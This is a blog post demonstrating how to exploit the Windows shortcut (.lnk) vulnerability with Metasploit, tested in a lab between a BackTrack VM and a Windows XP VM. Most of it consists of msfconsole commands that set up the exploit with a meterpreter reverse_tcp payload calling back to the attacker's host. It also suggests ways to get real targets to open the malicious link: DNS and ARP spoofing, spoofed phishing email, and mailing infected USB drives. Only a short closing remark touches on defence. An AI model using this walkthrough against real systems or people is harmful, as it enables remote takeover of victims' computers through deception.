A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.
Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.
Proof of concept testing:
This test was preformed using my BT4 VM which was assigned IP address 192.168.126.135 and a Win XPSP3 VM using IP address 192.168.126.134.
Step 1: Load Metasploit and get latest update
On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then load msfconsole once that is loaded run svn update so you can get the latest and greatest.
Step 2: Select your Exploit and Payload
msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options
The show options commands will show you the various parameters that needs to be set in order for the exploit to be functional. In our case its setting up the listening IP and listening port.
Step 3: Fill-in required options and run exploit
At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back too, since I selected reverse_tcp.
msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST 192.168.126.135
msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST 192.168.126.135
msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit
Step 4: Get your victim to click the link or view the malicious file
Now at this stage you have to get a bit creative, I can suggest a few things you can try:
- Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
- Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
- ARP spoof your host network and find a given target that’s using Facebook or one of many social networks and try to send them the link that way.
- Try a far out social engineering attack like purchase several USB drives inject them and mail them to your target with the label “free USB drive”.
Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;
Verify you have an active session, session using sessions -l, next connect to that session with sessions -i #, from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XPVM and that it was successfully exploited.
In the end there is really not much the average user can do that is not aware of your everyday vulnerability, but us as IT professional need to be in the loop so that we can take back the information and make them aware. Lastly the image in figure 6 should be a dead giveaway that something is up with your computer if you didn’t connect to a share but all of sudden you see one pop-up its time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback are welcome.